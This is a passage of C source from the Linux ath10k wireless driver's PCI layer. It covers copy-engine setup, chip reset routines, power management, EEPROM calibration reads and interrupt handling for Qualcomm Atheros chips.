QCA6174_HW_1_0_CHIP_ID_REV: case QCA6174_HW_1_1_CHIP_ID_REV: case QCA6174_HW_2_1_CHIP_ID_REV: case QCA6174_HW_2_2_CHIP_ID_REV: return 3; case QCA6174_HW_1_3_CHIP_ID_REV: return 2; case QCA6174_HW_3_0_CHIP_ID_REV: case QCA6174_HW_3_1_CHIP_ID_REV: case QCA6174_HW_3_2_CHIP_ID_REV: return 9; } break; case QCA9377_1_0_DEVICE_ID: return 9; } ath10k_warn(ar, "unknown number of banks, assuming 1\n"); return 1; } static int ath10k_bus_get_num_banks(struct ath10k *ar) { struct ath10k_ce *ce = ath10k_ce_priv(ar); return ce->bus_ops->get_num_banks(ar); } int ath10k_pci_init_config(struct ath10k *ar) { u32 interconnect_targ_addr; u32 pcie_state_targ_addr = 0; u32 pipe_cfg_targ_addr = 0; u32 svc_to_pipe_map = 0; u32 pcie_config_flags = 0; u32 ealloc_value; u32 ealloc_targ_addr; u32 flag2_value; u32 flag2_targ_addr; int ret = 0; /* Download to Target the CE Config and the service-to-CE map */ interconnect_targ_addr = host_interest_item_address(HI_ITEM(hi_interconnect_state)); /* Supply Target-side CE configuration */ ret = ath10k_pci_diag_read32(ar, interconnect_targ_addr, &pcie_state_targ_addr); if (ret != 0) { ath10k_err(ar, "Failed to get pcie state addr: %d\n", ret); return ret; } if (pcie_state_targ_addr == 0) { ret = -EIO; ath10k_err(ar, "Invalid pcie state addr\n"); return ret; } ret = ath10k_pci_diag_read32(ar, (pcie_state_targ_addr + offsetof(struct pcie_state, pipe_cfg_addr)), &pipe_cfg_targ_addr); if (ret != 0) { ath10k_err(ar, "Failed to get pipe cfg addr: %d\n", ret); return ret; } if (pipe_cfg_targ_addr == 0) { ret = -EIO; ath10k_err(ar, "Invalid pipe cfg addr\n"); return ret; } ret = ath10k_pci_diag_write_mem(ar, pipe_cfg_targ_addr, target_ce_config_wlan, sizeof(struct ce_pipe_config) * NUM_TARGET_CE_CONFIG_WLAN); if (ret != 0) { ath10k_err(ar, "Failed to write pipe cfg: %d\n", ret); return ret; } ret = ath10k_pci_diag_read32(ar, (pcie_state_targ_addr + offsetof(struct pcie_state, svc_to_pipe_map)), &svc_to_pipe_map); if (ret != 0) { ath10k_err(ar, "Failed to get svc/pipe map: %d\n", ret); return ret; } if (svc_to_pipe_map == 0) { ret = -EIO; ath10k_err(ar, "Invalid svc_to_pipe map\n"); return ret; } ret = ath10k_pci_diag_write_mem(ar, svc_to_pipe_map, target_service_to_ce_map_wlan, sizeof(target_service_to_ce_map_wlan)); if (ret != 0) { ath10k_err(ar, "Failed to write svc/pipe map: %d\n", ret); return ret; } ret = ath10k_pci_diag_read32(ar, (pcie_state_targ_addr + offsetof(struct pcie_state, config_flags)), &pcie_config_flags); if (ret != 0) { ath10k_err(ar, "Failed to get pcie config_flags: %d\n", ret); return ret; } pcie_config_flags &= ~PCIE_CONFIG_FLAG_ENABLE_L1; ret = ath10k_pci_diag_write32(ar, (pcie_state_targ_addr + offsetof(struct pcie_state, config_flags)), pcie_config_flags); if (ret != 0) { ath10k_err(ar, "Failed to write pcie config_flags: %d\n", ret); return ret; } /* configure early allocation */ ealloc_targ_addr = host_interest_item_address(HI_ITEM(hi_early_alloc)); ret = ath10k_pci_diag_read32(ar, ealloc_targ_addr, &ealloc_value); if (ret != 0) { ath10k_err(ar, "Failed to get early alloc val: %d\n", ret); return ret; } /* first bank is switched to IRAM */ ealloc_value |= ((HI_EARLY_ALLOC_MAGIC << HI_EARLY_ALLOC_MAGIC_SHIFT) & HI_EARLY_ALLOC_MAGIC_MASK); ealloc_value |= ((ath10k_bus_get_num_banks(ar) << HI_EARLY_ALLOC_IRAM_BANKS_SHIFT) & HI_EARLY_ALLOC_IRAM_BANKS_MASK); ret = ath10k_pci_diag_write32(ar, ealloc_targ_addr, ealloc_value); if (ret != 0) { ath10k_err(ar, "Failed to set early alloc val: %d\n", ret); return ret; } /* Tell Target to proceed with initialization */ flag2_targ_addr = host_interest_item_address(HI_ITEM(hi_option_flag2)); ret = ath10k_pci_diag_read32(ar, flag2_targ_addr, &flag2_value); if (ret != 0) { ath10k_err(ar, "Failed to get option val: %d\n", ret); return ret; } flag2_value |= HI_OPTION_EARLY_CFG_DONE; ret = ath10k_pci_diag_write32(ar, flag2_targ_addr, flag2_value); if (ret != 0) { ath10k_err(ar, "Failed to set option val: %d\n", ret); return ret; } return 0; } static void ath10k_pci_override_ce_config(struct ath10k *ar) { struct ce_attr *attr; struct ce_pipe_config *config; /* For QCA6174 we're overriding the Copy Engine 5 configuration, * since it is currently used for other feature. */ /* Override Host's Copy Engine 5 configuration */ attr = &host_ce_config_wlan[5]; attr->src_sz_max = 0; attr->dest_nentries = 0; /* Override Target firmware's Copy Engine configuration */ config = &target_ce_config_wlan[5]; config->pipedir = __cpu_to_le32(PIPEDIR_OUT); config->nbytes_max = __cpu_to_le32(2048); /* Map from service/endpoint to Copy Engine */ target_service_to_ce_map_wlan[15].pipenum = __cpu_to_le32(1); } int ath10k_pci_alloc_pipes(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); struct ath10k_pci_pipe *pipe; struct ath10k_ce *ce = ath10k_ce_priv(ar); int i, ret; for (i = 0; i < CE_COUNT; i++) { pipe = &ar_pci->pipe_info[i]; pipe->ce_hdl = &ce->ce_states[i]; pipe->pipe_num = i; pipe->hif_ce_state = ar; ret = ath10k_ce_alloc_pipe(ar, i, &host_ce_config_wlan[i]); if (ret) { ath10k_err(ar, "failed to allocate copy engine pipe %d: %d\n", i, ret); return ret; } /* Last CE is Diagnostic Window */ if (i == CE_DIAG_PIPE) { ar_pci->ce_diag = pipe->ce_hdl; continue; } pipe->buf_sz = (size_t)(host_ce_config_wlan[i].src_sz_max); } return 0; } void ath10k_pci_free_pipes(struct ath10k *ar) { int i; for (i = 0; i < CE_COUNT; i++) ath10k_ce_free_pipe(ar, i); } int ath10k_pci_init_pipes(struct ath10k *ar) { int i, ret; for (i = 0; i < CE_COUNT; i++) { ret = ath10k_ce_init_pipe(ar, i, &host_ce_config_wlan[i]); if (ret) { ath10k_err(ar, "failed to initialize copy engine pipe %d: %d\n", i, ret); return ret; } } return 0; } static bool ath10k_pci_has_fw_crashed(struct ath10k *ar) { return ath10k_pci_read32(ar, FW_INDICATOR_ADDRESS) & FW_IND_EVENT_PENDING; } static void ath10k_pci_fw_crashed_clear(struct ath10k *ar) { u32 val; val = ath10k_pci_read32(ar, FW_INDICATOR_ADDRESS); val &= ~FW_IND_EVENT_PENDING; ath10k_pci_write32(ar, FW_INDICATOR_ADDRESS, val); } static bool ath10k_pci_has_device_gone(struct ath10k *ar) { u32 val; val = ath10k_pci_read32(ar, FW_INDICATOR_ADDRESS); return (val == 0xffffffff); } /* this function effectively clears target memory controller assert line */ static void ath10k_pci_warm_reset_si0(struct ath10k *ar) { u32 val; val = ath10k_pci_soc_read32(ar, SOC_RESET_CONTROL_ADDRESS); ath10k_pci_soc_write32(ar, SOC_RESET_CONTROL_ADDRESS, val | SOC_RESET_CONTROL_SI0_RST_MASK); val = ath10k_pci_soc_read32(ar, SOC_RESET_CONTROL_ADDRESS); msleep(10); val = ath10k_pci_soc_read32(ar, SOC_RESET_CONTROL_ADDRESS); ath10k_pci_soc_write32(ar, SOC_RESET_CONTROL_ADDRESS, val & ~SOC_RESET_CONTROL_SI0_RST_MASK); val = ath10k_pci_soc_read32(ar, SOC_RESET_CONTROL_ADDRESS); msleep(10); } static void ath10k_pci_warm_reset_cpu(struct ath10k *ar) { u32 val; ath10k_pci_write32(ar, FW_INDICATOR_ADDRESS, 0); val = ath10k_pci_read32(ar, RTC_SOC_BASE_ADDRESS + SOC_RESET_CONTROL_ADDRESS); ath10k_pci_write32(ar, RTC_SOC_BASE_ADDRESS + SOC_RESET_CONTROL_ADDRESS, val | SOC_RESET_CONTROL_CPU_WARM_RST_MASK); } static void ath10k_pci_warm_reset_ce(struct ath10k *ar) { u32 val; val = ath10k_pci_read32(ar, RTC_SOC_BASE_ADDRESS + SOC_RESET_CONTROL_ADDRESS); ath10k_pci_write32(ar, RTC_SOC_BASE_ADDRESS + SOC_RESET_CONTROL_ADDRESS, val | SOC_RESET_CONTROL_CE_RST_MASK); msleep(10); ath10k_pci_write32(ar, RTC_SOC_BASE_ADDRESS + SOC_RESET_CONTROL_ADDRESS, val & ~SOC_RESET_CONTROL_CE_RST_MASK); } static void ath10k_pci_warm_reset_clear_lf(struct ath10k *ar) { u32 val; val = ath10k_pci_read32(ar, RTC_SOC_BASE_ADDRESS + SOC_LF_TIMER_CONTROL0_ADDRESS); ath10k_pci_write32(ar, RTC_SOC_BASE_ADDRESS + SOC_LF_TIMER_CONTROL0_ADDRESS, val & ~SOC_LF_TIMER_CONTROL0_ENABLE_MASK); } static int ath10k_pci_warm_reset(struct ath10k *ar) { int ret; ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot warm reset\n"); spin_lock_bh(&ar->data_lock); ar->stats.fw_warm_reset_counter++; spin_unlock_bh(&ar->data_lock); ath10k_pci_irq_disable(ar); /* Make sure the target CPU is not doing anything dangerous, e.g. if it * were to access copy engine while host performs copy engine reset * then it is possible for the device to confuse pci-e controller to * the point of bringing host system to a complete stop (i.e. hang). */ ath10k_pci_warm_reset_si0(ar); ath10k_pci_warm_reset_cpu(ar); ath10k_pci_init_pipes(ar); ath10k_pci_wait_for_target_init(ar); ath10k_pci_warm_reset_clear_lf(ar); ath10k_pci_warm_reset_ce(ar); ath10k_pci_warm_reset_cpu(ar); ath10k_pci_init_pipes(ar); ret = ath10k_pci_wait_for_target_init(ar); if (ret) { ath10k_warn(ar, "failed to wait for target init: %d\n", ret); return ret; } ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot warm reset complete\n"); return 0; } static int ath10k_pci_qca99x0_soft_chip_reset(struct ath10k *ar) { ath10k_pci_irq_disable(ar); return ath10k_pci_qca99x0_chip_reset(ar); } static int ath10k_pci_safe_chip_reset(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); if (!ar_pci->pci_soft_reset) return -ENOTSUPP; return ar_pci->pci_soft_reset(ar); } static int ath10k_pci_qca988x_chip_reset(struct ath10k *ar) { int i, ret; u32 val; ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot 988x chip reset\n"); /* Some hardware revisions (e.g. CUS223v2) has issues with cold reset. * It is thus preferred to use warm reset which is safer but may not be * able to recover the device from all possible fail scenarios. * * Warm reset doesn't always work on first try so attempt it a few * times before giving up. */ for (i = 0; i < ATH10K_PCI_NUM_WARM_RESET_ATTEMPTS; i++) { ret = ath10k_pci_warm_reset(ar); if (ret) { ath10k_warn(ar, "failed to warm reset attempt %d of %d: %d\n", i + 1, ATH10K_PCI_NUM_WARM_RESET_ATTEMPTS, ret); continue; } /* FIXME: Sometimes copy engine doesn't recover after warm * reset. In most cases this needs cold reset. In some of these * cases the device is in such a state that a cold reset may * lock up the host. * * Reading any host interest register via copy engine is * sufficient to verify if device is capable of booting * firmware blob. */ ret = ath10k_pci_init_pipes(ar); if (ret) { ath10k_warn(ar, "failed to init copy engine: %d\n", ret); continue; } ret = ath10k_pci_diag_read32(ar, QCA988X_HOST_INTEREST_ADDRESS, &val); if (ret) { ath10k_warn(ar, "failed to poke copy engine: %d\n", ret); continue; } ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot chip reset complete (warm)\n"); return 0; } if (ath10k_pci_reset_mode == ATH10K_PCI_RESET_WARM_ONLY) { ath10k_warn(ar, "refusing cold reset as requested\n"); return -EPERM; } ret = ath10k_pci_cold_reset(ar); if (ret) { ath10k_warn(ar, "failed to cold reset: %d\n", ret); return ret; } ret = ath10k_pci_wait_for_target_init(ar); if (ret) { ath10k_warn(ar, "failed to wait for target after cold reset: %d\n", ret); return ret; } ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot qca988x chip reset complete (cold)\n"); return 0; } static int ath10k_pci_qca6174_chip_reset(struct ath10k *ar) { int ret; ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot qca6174 chip reset\n"); /* FIXME: QCA6174 requires cold + warm reset to work. */ ret = ath10k_pci_cold_reset(ar); if (ret) { ath10k_warn(ar, "failed to cold reset: %d\n", ret); return ret; } ret = ath10k_pci_wait_for_target_init(ar); if (ret) { ath10k_warn(ar, "failed to wait for target after cold reset: %d\n", ret); return ret; } ret = ath10k_pci_warm_reset(ar); if (ret) { ath10k_warn(ar, "failed to warm reset: %d\n", ret); return ret; } ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot qca6174 chip reset complete (cold)\n"); return 0; } static int ath10k_pci_qca99x0_chip_reset(struct ath10k *ar) { int ret; ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot qca99x0 chip reset\n"); ret = ath10k_pci_cold_reset(ar); if (ret) { ath10k_warn(ar, "failed to cold reset: %d\n", ret); return ret; } ret = ath10k_pci_wait_for_target_init(ar); if (ret) { ath10k_warn(ar, "failed to wait for target after cold reset: %d\n", ret); return ret; } ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot qca99x0 chip reset complete (cold)\n"); return 0; } static int ath10k_pci_chip_reset(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); if (WARN_ON(!ar_pci->pci_hard_reset)) return -ENOTSUPP; return ar_pci->pci_hard_reset(ar); } static int ath10k_pci_hif_power_up(struct ath10k *ar, enum ath10k_firmware_mode fw_mode) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); int ret; ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot hif power up\n"); pcie_capability_read_word(ar_pci->pdev, PCI_EXP_LNKCTL, &ar_pci->link_ctl); pcie_capability_write_word(ar_pci->pdev, PCI_EXP_LNKCTL, ar_pci->link_ctl & ~PCI_EXP_LNKCTL_ASPMC); /* * Bring the target up cleanly. * * The target may be in an undefined state with an AUX-powered Target * and a Host in WoW mode. If the Host crashes, loses power, or is * restarted (without unloading the driver) then the Target is left * (aux) powered and running. On a subsequent driver load, the Target * is in an unexpected state. We try to catch that here in order to * reset the Target and retry the probe. */ ret = ath10k_pci_chip_reset(ar); if (ret) { if (ath10k_pci_has_fw_crashed(ar)) { ath10k_warn(ar, "firmware crashed during chip reset\n"); ath10k_pci_fw_crashed_clear(ar); ath10k_pci_fw_crashed_dump(ar); } ath10k_err(ar, "failed to reset chip: %d\n", ret); goto err_sleep; } ret = ath10k_pci_init_pipes(ar); if (ret) { ath10k_err(ar, "failed to initialize CE: %d\n", ret); goto err_sleep; } ret = ath10k_pci_init_config(ar); if (ret) { ath10k_err(ar, "failed to setup init config: %d\n", ret); goto err_ce; } ret = ath10k_pci_wake_target_cpu(ar); if (ret) { ath10k_err(ar, "could not wake up target CPU: %d\n", ret); goto err_ce; } return 0; err_ce: ath10k_pci_ce_deinit(ar); err_sleep: return ret; } void ath10k_pci_hif_power_down(struct ath10k *ar) { ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot hif power down\n"); /* Currently hif_power_up performs effectively a reset and hif_stop * resets the chip as well so there's no point in resetting here. */ } static int ath10k_pci_hif_suspend(struct ath10k *ar) { /* Nothing to do; the important stuff is in the driver suspend. */ return 0; } static int ath10k_pci_suspend(struct ath10k *ar) { /* The grace timer can still be counting down and ar->ps_awake be true. * It is known that the device may be asleep after resuming regardless * of the SoC powersave state before suspending. Hence make sure the * device is asleep before proceeding. */ ath10k_pci_sleep_sync(ar); return 0; } static int ath10k_pci_hif_resume(struct ath10k *ar) { /* Nothing to do; the important stuff is in the driver resume. */ return 0; } static int ath10k_pci_resume(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); struct pci_dev *pdev = ar_pci->pdev; u32 val; int ret = 0; ret = ath10k_pci_force_wake(ar); if (ret) { ath10k_err(ar, "failed to wake up target: %d\n", ret); return ret; } /* Suspend/Resume resets the PCI configuration space, so we have to * re-disable the RETRY_TIMEOUT register (0x41) to keep PCI Tx retries * from interfering with C3 CPU state. pci_restore_state won't help * here since it only restores the first 64 bytes pci config header. */ pci_read_config_dword(pdev, 0x40, &val); if ((val & 0x0000ff00) != 0) pci_write_config_dword(pdev, 0x40, val & 0xffff00ff); return ret; } static bool ath10k_pci_validate_cal(void *data, size_t size) { __le16 *cal_words = data; u16 checksum = 0; size_t i; if (size % 2 != 0) return false; for (i = 0; i < size / 2; i++) checksum ^= le16_to_cpu(cal_words[i]); return checksum == 0xffff; } static void ath10k_pci_enable_eeprom(struct ath10k *ar) { /* Enable SI clock */ ath10k_pci_soc_write32(ar, CLOCK_CONTROL_OFFSET, 0x0); /* Configure GPIOs for I2C operation */ ath10k_pci_write32(ar, GPIO_BASE_ADDRESS + GPIO_PIN0_OFFSET + 4 * QCA9887_1_0_I2C_SDA_GPIO_PIN, SM(QCA9887_1_0_I2C_SDA_PIN_CONFIG, GPIO_PIN0_CONFIG) | SM(1, GPIO_PIN0_PAD_PULL)); ath10k_pci_write32(ar, GPIO_BASE_ADDRESS + GPIO_PIN0_OFFSET + 4 * QCA9887_1_0_SI_CLK_GPIO_PIN, SM(QCA9887_1_0_SI_CLK_PIN_CONFIG, GPIO_PIN0_CONFIG) | SM(1, GPIO_PIN0_PAD_PULL)); ath10k_pci_write32(ar, GPIO_BASE_ADDRESS + QCA9887_1_0_GPIO_ENABLE_W1TS_LOW_ADDRESS, 1u << QCA9887_1_0_SI_CLK_GPIO_PIN); /* In Swift ASIC - EEPROM clock will be (110MHz/512) = 214KHz */ ath10k_pci_write32(ar, SI_BASE_ADDRESS + SI_CONFIG_OFFSET, SM(1, SI_CONFIG_ERR_INT) | SM(1, SI_CONFIG_BIDIR_OD_DATA) | SM(1, SI_CONFIG_I2C) | SM(1, SI_CONFIG_POS_SAMPLE) | SM(1, SI_CONFIG_INACTIVE_DATA) | SM(1, SI_CONFIG_INACTIVE_CLK) | SM(8, SI_CONFIG_DIVIDER)); } static int ath10k_pci_read_eeprom(struct ath10k *ar, u16 addr, u8 *out) { u32 reg; int wait_limit; /* set device select byte and for the read operation */ reg = QCA9887_EEPROM_SELECT_READ | SM(addr, QCA9887_EEPROM_ADDR_LO) | SM(addr >> 8, QCA9887_EEPROM_ADDR_HI); ath10k_pci_write32(ar, SI_BASE_ADDRESS + SI_TX_DATA0_OFFSET, reg); /* write transmit data, transfer length, and START bit */ ath10k_pci_write32(ar, SI_BASE_ADDRESS + SI_CS_OFFSET, SM(1, SI_CS_START) | SM(1, SI_CS_RX_CNT) | SM(4, SI_CS_TX_CNT)); /* wait max 1 sec */ wait_limit = 100000; /* wait for SI_CS_DONE_INT */ do { reg = ath10k_pci_read32(ar, SI_BASE_ADDRESS + SI_CS_OFFSET); if (MS(reg, SI_CS_DONE_INT)) break; wait_limit--; udelay(10); } while (wait_limit > 0); if (!MS(reg, SI_CS_DONE_INT)) { ath10k_err(ar, "timeout while reading device EEPROM at %04x\n", addr); return -ETIMEDOUT; } /* clear SI_CS_DONE_INT */ ath10k_pci_write32(ar, SI_BASE_ADDRESS + SI_CS_OFFSET, reg); if (MS(reg, SI_CS_DONE_ERR)) { ath10k_err(ar, "failed to read device EEPROM at %04x\n", addr); return -EIO; } /* extract receive data */ reg = ath10k_pci_read32(ar, SI_BASE_ADDRESS + SI_RX_DATA0_OFFSET); *out = reg; return 0; } static int ath10k_pci_hif_fetch_cal_eeprom(struct ath10k *ar, void **data, size_t *data_len) { u8 *caldata = NULL; size_t calsize, i; int ret; if (!QCA_REV_9887(ar)) return -EOPNOTSUPP; calsize = ar->hw_params.cal_data_len; caldata = kmalloc(calsize, GFP_KERNEL); if (!caldata) return -ENOMEM; ath10k_pci_enable_eeprom(ar); for (i = 0; i < calsize; i++) { ret = ath10k_pci_read_eeprom(ar, i, &caldata[i]); if (ret) goto err_free; } if (!ath10k_pci_validate_cal(caldata, calsize)) goto err_free; *data = caldata; *data_len = calsize; return 0; err_free: kfree(caldata); return -EINVAL; } static const struct ath10k_hif_ops ath10k_pci_hif_ops = { .tx_sg = ath10k_pci_hif_tx_sg, .diag_read = ath10k_pci_hif_diag_read, .diag_write = ath10k_pci_diag_write_mem, .exchange_bmi_msg = ath10k_pci_hif_exchange_bmi_msg, .start = ath10k_pci_hif_start, .stop = ath10k_pci_hif_stop, .map_service_to_pipe = ath10k_pci_hif_map_service_to_pipe, .get_default_pipe = ath10k_pci_hif_get_default_pipe, .send_complete_check = ath10k_pci_hif_send_complete_check, .get_free_queue_number = ath10k_pci_hif_get_free_queue_number, .power_up = ath10k_pci_hif_power_up, .power_down = ath10k_pci_hif_power_down, .read32 = ath10k_pci_read32, .write32 = ath10k_pci_write32, .suspend = ath10k_pci_hif_suspend, .resume = ath10k_pci_hif_resume, .fetch_cal_eeprom = ath10k_pci_hif_fetch_cal_eeprom, }; /* * Top-level interrupt handler for all PCI interrupts from a Target. * When a block of MSI interrupts is allocated, this top-level handler * is not used; instead, we directly call the correct sub-handler. */ static irqreturn_t ath10k_pci_interrupt_handler(int irq, void *arg) { struct ath10k *ar = arg; struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); int ret; if (ath10k_pci_has_device_gone(ar)) return IRQ_NONE; ret = ath10k_pci_force_wake(ar); if (ret) { ath10k_warn(ar, "failed to wake device up on irq: %d\n", ret); return IRQ_NONE; } if ((ar_pci->oper_irq_mode == ATH10K_PCI_IRQ_LEGACY) && !ath10k_pci_irq_pending(ar)) return IRQ_NONE; ath10k_pci_disable_and_clear_legacy_irq(ar); ath10k_pci_irq_msi_fw_mask(ar); napi_schedule(&ar->napi); return IRQ_HANDLED; } static int ath10k_pci_napi_poll(struct napi_struct *ctx, int budget) { struct ath10k *ar = container_of(ctx, struct ath10k, napi); int done = 0; if (ath10k_pci_has_fw_crashed(ar)) { ath10k_pci_fw_crashed_clear(ar); ath10k_pci_fw_crashed_dump(ar); napi_complete(ctx); return done; } ath10k_ce_per_engine_service_any(ar); done = ath10k_htt_txrx_compl_task(ar, budget); if (done < budget) { napi_complete_done(ctx, done); /* In case of MSI, it is possible that interrupts are received * while NAPI poll is inprogress. So pending interrupts that are * received after processing all copy engine pipes by NAPI poll * will not be handled again. This is causing failure to * complete boot sequence in x86 platform. So before enabling * interrupts safer to check for pending interrupts for * immediate servicing. */ if (ath10k_ce_interrupt_summary(ar)) { napi_reschedule(ctx); goto out; } ath10k_pci_enable_legacy_irq(ar); ath10k_pci_irq_msi_fw_unmask(ar); } out: return done; } static int ath10k_pci_request_irq_msi(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); int ret; ret = request_irq(ar_pci->pdev->irq, ath10k_pci_interrupt_handler, IRQF_SHARED, "ath10k_pci", ar); if (ret) { ath10k_warn(ar, "failed to request MSI irq %d: %d\n", ar_pci->pdev->irq, ret); return ret; } return 0; } static int ath10k_pci_request_irq_legacy(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); int ret; ret = request_irq(ar_pci->pdev->irq, ath10k_pci_interrupt_handler, IRQF_SHARED, "ath10k_pci", ar); if (ret) { ath10k_warn(ar, "failed to request legacy irq %d: %d\n", ar_pci->pdev->irq, ret); return ret; } return 0; } static int ath10k_pci_request_irq(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); switch (ar_pci->oper_irq_mode) { case ATH10K_PCI_IRQ_LEGACY: return ath10k_pci_request_irq_legacy(ar); case ATH10K_PCI_IRQ_MSI: return ath10k_pci_request_irq_msi(ar); default: return -EINVAL; } } static void ath10k_pci_free_irq(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); free_irq(ar_pci->pdev->irq, ar); } void ath10k_pci_init_napi(struct ath10k *ar) { netif_napi_add(&ar->napi_dev, &ar->napi, ath10k_pci_napi_poll, ATH10K_NAPI_BUDGET); } static int ath10k_pci_init_irq(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); int ret; ath10k_pci_init_napi(ar); if (ath10k_pci_irq_mode != ATH10K_PCI_IRQ_AUTO) ath10k_info(ar, "limiting irq mode to: %d\n", ath10k_pci_irq_mode); /* Try MSI */ if (ath10k_pci_irq_mode != ATH10K_PCI_IRQ_LEGACY) { ar_pci->oper_irq_mode = ATH10K_PCI_IRQ_MSI; ret = pci_enable_msi(ar_pci->pdev); if (ret == 0) return 0; /* fall-through */ } /* Try legacy irq * * A potential race occurs here: The CORE_BASE write * depends on target correctly decoding AXI address but * host won't know when target writes BAR to CORE_CTRL. * This write might get lost if target has NOT written BAR. * For now, fix the race by repeating the write in below * synchronization checking. */ ar_pci->oper_irq_mode = ATH10K_PCI_IRQ_LEGACY; ath10k_pci_write32(ar, SOC_CORE_BASE_ADDRESS + PCIE_INTR_ENABLE_ADDRESS, PCIE_INTR_FIRMWARE_MASK | PCIE_INTR_CE_MASK_ALL); return 0; } static void ath10k_pci_deinit_irq_legacy(struct ath10k *ar) { ath10k_pci_write32(ar, SOC_CORE_BASE_ADDRESS + PCIE_INTR_ENABLE_ADDRESS, 0); } static int ath10k_pci_deinit_irq(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); switch (ar_pci->oper_irq_mode) { case ATH10K_PCI_IRQ_LEGACY: ath10k_pci_deinit_irq_legacy(ar); break; default: pci_disable_msi(ar_pci->pdev); break; } return 0; } int ath10k_pci_wait_for_target_init(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); unsigned long timeout; u32 val; ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot waiting target to initialise\n"); timeout = jiffies + msecs_to_jiffies(ATH10K_PCI_TARGET_WAIT); do { val = ath10k_pci_read32(ar, FW_INDICATOR_ADDRESS); ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot target indicator %x\n", val); /* target should never return this */ if (val == 0xffffffff) continue; /* the device has crashed so don't bother trying anymore */ if (val & FW_IND_EVENT_PENDING) break; if (val & FW_IND_INITIALIZED) break; if (ar_pci->oper_irq_mode == ATH10K_PCI_IRQ_LEGACY) /* Fix potential race by repeating CORE_BASE writes */ ath10k_pci_enable_legacy_irq(ar); mdelay(10); } while (time_before(jiffies, timeout)); ath10k_pci_disable_and_clear_legacy_irq(ar); ath10k_pci_irq_msi_fw_mask(ar); if (val == 0xffffffff) { ath10k_err(ar, "failed to read device register, device is gone\n"); return -EIO; } if (val & FW_IND_EVENT_PENDING) { ath10k_warn(ar, "device has crashed during init\n"); return -ECOMM; } if (!(val & FW_IND_INITIALIZED)) { ath10k_err(ar, "failed to receive initialized event from target: %08x\n", val); return -ETIMEDOUT; } ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot target initialised\n"); return 0; } static int ath10k_pci_cold_reset(struct ath10k *ar) { u32 val; ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot cold reset\n"); spin_lock_bh(&ar->data_lock); ar->stats.fw_cold_reset_counter++; spin_unlock_bh(&ar->data_lock); /* Put Target, including PCIe, into RESET. */ val = ath10k_pci_reg_read32(ar, SOC_GLOBAL_RESET_ADDRESS); val |= 1; ath10k_pci_reg_write32(ar, SOC_GLOBAL_RESET_ADDRESS, val); /* After writing into SOC_GLOBAL_RESET to put device into * reset and pulling out of reset pcie may not be stable * for any immediate pcie register access and cause bus error, * add delay before any pcie access request to fix this issue. */ msleep(20); /* Pull Target, including PCIe, out of RESET. */ val &= ~1; ath10k_pci_reg_write32(ar, SOC_GLOBAL_RESET_ADDRESS, val); msleep(20); ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot cold reset complete\n"); return 0; } static int ath10k_pci_claim(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); struct pci_dev *pdev = ar_pci->pdev; int ret; pci_set_drvdata(pdev, ar); ret = pci_enable_device(pdev); if (ret) { ath10k_err(ar, "failed to enable pci device: %d\n", ret); return ret; } ret = pci_request_region(pdev, BAR_NUM, "ath"); if (ret) { ath10k_err(ar, "failed to request region BAR%d: %d\n", BAR_NUM, ret); goto err_device; } /* Target expects 32 bit DMA. Enforce it. */ ret = pci_set_dma_mask(pdev, DMA_BIT_MASK(32)); if (ret) { ath10k_err(ar, "failed to set dma mask to 32-bit: %d\n", ret); goto err_region; } ret = pci_set_consistent_dma_mask(pdev, DMA_BIT_MASK(32)); if (ret) { ath10k_err(ar, "failed to set consistent dma mask to 32-bit: %d\n", ret); goto err_region; } pci_set_master(pdev); /* Arrange for access to Target SoC registers. */ ar_pci->mem_len = pci_resource_len(pdev, BAR_NUM); ar_pci->mem = pci_iomap(pdev, BAR_NUM, 0); if (!ar_pci->mem) { ath10k_err(ar, "failed to iomap BAR%d\n", BAR_NUM); ret = -EIO; goto err_master; } ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot pci_mem 0x%pK\n", ar_pci->mem); return 0; err_master: pci_clear_master(pdev); err_region: pci_release_region(pdev, BAR_NUM); err_device: pci_disable_device(pdev); return ret; } static void ath10k_pci_release(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); struct pci_dev *pdev = ar_pci->pdev; pci_iounmap(pdev, ar_pci->mem); pci_release_region(pdev, BAR_NUM); pci_clear_master(pdev); pci_disable_device(pdev); } static bool ath10k_pci_chip_is_supported(u32 dev_id, u32 chip_id) { const struct ath10k_pci_supp_chip *supp_chip; int i; u32 rev_id = MS(chip_id, SOC_CHIP_ID_REV); for (i = 0; i < ARRAY_SIZE(ath10k_pci_supp_chips); i++) { supp_chip = &ath10k_pci_supp_chips[i]; if (supp_chip->dev_id == dev_id && supp_chip->rev_id == rev_id) return true; } return false; } int ath10k_pci_setup_resource(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); struct ath10k_ce *ce = 